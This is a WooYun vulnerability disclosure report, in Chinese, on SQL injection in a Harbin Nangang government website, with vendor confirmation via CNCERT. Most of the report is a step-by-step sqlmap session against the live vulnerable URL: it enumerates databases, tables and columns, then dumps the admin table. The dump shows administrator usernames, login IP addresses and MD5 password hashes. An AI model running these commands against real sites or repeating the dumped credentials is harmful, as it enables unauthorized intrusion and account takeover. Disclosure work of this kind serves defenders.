当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060182

漏洞标题:哈尔滨南岗先锋网&MySQL注入导致数据库大量重要信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 从容

提交时间:2014-05-11 15:14

修复时间:2014-06-25 15:14

公开时间:2014-06-25 15:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-11: 细节已通知厂商并且等待厂商处理中
2014-05-14: 厂商已经确认,细节仅向厂商公开
2014-05-24: 细节向核心白帽子及相关领域专家公开
2014-06-03: 细节向普通白帽子公开
2014-06-13: 细节向实习白帽子公开
2014-06-25: 细节向公众公开

简要描述:

哈尔滨南岗先锋网&MySQL注入导致数据库大量重要信息泄露

详细说明:

注入地址:

http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275

漏洞证明:

SQLMAP- -.
获取一个数据库:

./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" --dbs


available databases [2]:                                                       
[*] information_schema
[*] ngxfw


获取数据库中的表:

./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw --tables


[19 tables]
+----------------+
| admanager |
| admin |
| adtype |
| bigtype |
| city |
| comment |
| goodsattribute |
| goodsattrvalue |
| goodsorder |
| infoclass |
| infolist |
| mail_config |
| member |
| message |
| province |
| userip |
| webconfig |
| weblink |
| weblinktype |
+----------------+


获取字段:

./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw -T admin --columns


[8 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| checkadmin | enum('true','false') |
| id | int(10) unsigned |
| levelarray | varchar(255) |
| levelname | char(30) |
| loginip | varchar(20) |
| logintime | char(20) |
| password | char(32) |
| username | char(30) |
+------------+----------------------+


获取内容:

./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw -T admin -C id,loginip,username,password --dump


[2 entries]
+----+---------------+---------------+----------------------------------+
| id | loginip | username | password |
+----+---------------+---------------+----------------------------------+
| 1 | 113.0.112.122 | zhongshen | a004c0bec4c5fcc51114a27b4895236a |
| 6 | 127.0.0.1 | zhongshenkeji | 594104dc8420b4bbc5b2cfd292ed92e9 |
+----+---------------+---------------+----------------------------------+


OVER!
还有很多,就不一一展示了~

修复方案:

:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-14 18:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心处置。

最新状态:

暂无